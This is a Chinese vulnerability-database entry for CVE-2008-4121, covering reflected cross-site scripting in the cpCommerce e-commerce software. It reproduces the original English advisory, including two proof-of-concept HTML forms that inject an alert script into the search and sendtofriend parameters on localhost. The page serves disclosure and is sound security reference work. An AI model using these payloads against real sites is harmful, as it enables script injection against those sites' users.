cpCommerce 多个跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1184898 漏洞类型 跨站脚本
发布时间 2008-10-20 更新时间 2008-10-21
CVE编号 CVE-2008-4121 CNNVD-ID CNNVD-200810-337
漏洞平台 N/A CVSS评分 4.3
|漏洞来源
https://www.securityfocus.com/bid/31825
https://cxsecurity.com/issue/WLB-2008100054
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200810-337
|漏洞详情
cpCommerce存在多个跨站脚本攻击漏洞漏洞,远程攻击者可以借助search.php的search.quick操作中的search参数和sendtofriend.php的sendtofriend操作中的name参数,注入任意的web脚本或HTML。
|漏洞EXP
Cross Site Scripting (XSS) Vulnerabilitiy in cpcommerce,
CVE-2008-4121 

References

http://www.datensalat.eu/~fabian/cve/CVE-2008-4121-cpcommerce.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4121
http://cpcommerce.cpradio.org/

Description

cpCommerce is an open-source e-commerce solution that is maintained by
templates and modules. 

Example

Assuming cpcommerce is installed on http://localhost/cpcommerce/,
anybody could inject JavaScript:

<form method="post" action="http://localhost/cpcommerce/search.php">
<input type="hidden" name="action" value="search.quick">
<input type="text" name="search" value='"><script>alert(1)</script>'>
<input type=submit></form>

<form method="post" action="http://localhost/cpcommerce/sendtofriend.php"> <input
type="hidden" name="action" value="sendtofriend"> 
<input type="text" name="name" value='"><script>alert(1)</script>'>
<input type=submit></form>

Disclosure Timeline

2008-09-23 Vendor contacted
2008-09-23 Vendor released 1.2.4
2008-10-19 Published advisory

CVE Information

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-4121 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems. 

Credits and copyright

This vulnerability was discovered by Fabian Fingerle (published with
help from Hanno Boeck [0]). It's licensed under the creative commons
attribution license.

Fabian Fingerle, 2008-09-04, http://www.fabian-fingerle.de

[0] http://www.hboeck.de


|受影响的产品
cpCommerce cpCommerce 1.2.3 cpCommerce cpCommerce 1.1 cpCommerce cpCommerce 0.5 f
|参考资料

来源:BUGTRAQ
名称:20081019CrossSiteScripting(XSS)Vulnerabilitiyincpcommerce,CVE-2008-4121
链接:http://www.securityfocus.com/archive/1/archive/1/497545/100/0/threaded
来源:MISC
链接:http://www.datensalat.eu/~fabian/cve/CVE-2008-4121-cpcommerce.html
来源:SREASON
名称:4448
链接:http://securityreason.com/securityalert/4448
来源:SECUNIA
名称:32353
链接:http://secunia.com/advisories/32353
来源:cpcommerce.cpradio.org
链接:http://cpcommerce.cpradio.org/